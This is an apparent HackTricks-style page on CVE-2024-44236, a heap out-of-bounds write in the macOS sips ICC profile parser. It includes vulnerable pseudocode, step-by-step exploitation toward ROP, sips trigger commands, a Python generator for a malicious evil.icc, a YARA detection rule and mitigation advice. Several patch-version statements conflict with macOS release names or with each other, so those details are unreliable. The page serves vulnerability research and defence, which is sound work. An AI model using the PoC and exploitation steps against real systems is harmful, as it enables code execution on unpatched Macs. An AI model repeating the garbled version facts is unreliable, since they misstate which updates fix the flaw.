# WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236) {{#include ../../banners/hacktricks-training.md}} ## Overview An out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If attackers set `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8). > Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025. ## Vulnerable Code ```c // Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1) if (offsetToCLUT <= tagDataSize) { // BAD ➜ zero 16 bytes starting *at* offsetToCLUT for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++) buffer[i] = 0; // no bounds check vs allocated size! } ``` ## Exploitation Steps 1. **Craft a malicious `.icc` profile** * Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag. * Configure the tag table so the **`offsetToCLUT` equals the tag size** (`tagDataSize`). * Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata. 2. **Trigger parsing with any sips operation that touches the profile** ```bash # verification path (no output file needed) sips --verifyColor evil.icc # or implicitly when converting images that embed the profile sips -s format png payload.jpg --out out.png ``` 3. **Heap metadata corruption ➜ arbitrary write ➜ ROP** On Apple’s default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the aligned 0x1000 slab. By placing the profile’s tag at the end of such a slab, the 16 zero-writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, letting the attacker **allocate a fake object at an arbitrary address** and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer. ### Quick PoC generator (Python 3) ```python #!/usr/bin/env python3 import struct, sys HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding) TAGS = [(b'mAB ', 132, 52)] # one tag directly after header profile = HDR profile += struct.pack('>I', len(TAGS)) # tag count profile += b''.join(struct.pack('>4sII', *t) for t in TAGS) mab = bytearray(52) # tag payload (52 bytes) struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start) profile += mab open('evil.icc', 'wb').write(profile) print('[+] Wrote evil.icc (%d bytes)' % len(profile)) ``` ### YARA detection rule ```yara rule ICC_mAB_offsetToCLUT_anomaly { meta: description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)" author = "HackTricks" strings: $magic = { 61 63 73 70 } // 'acsp' $mab = { 6D 41 42 20 } // 'mAB ' $mba = { 6D 42 41 20 } // 'mBA ' condition: $magic at 0 and for any i in (0 .. 10): // up to 10 tags ( ($mab at 132 + 12*i or $mba at 132 + 12*i) and uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size ) } ``` ## Impact Opening or processing a crafted ICC profile leads to remote **arbitrary code execution** in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF). ## Detection & Mitigation * **Patch!** Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1). * Deploy the YARA rule above on email gateways and EDR solutions. * Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original ` before further processing on untrusted files. * Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content. * For DFIR, look for recent execution of `sips --verifyColor` or `ColorSync` library loads by sandboxed apps in the unified log. ## References * Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)” https://www.zerodayinitiative.com/advisories/ZDI-24-1445/ * Apple security updates HT213981 “About the security content of macOS Sonoma 15.2” https://support.apple.com/en-us/HT213981 {{#include ../../banners/hacktricks-training.md}}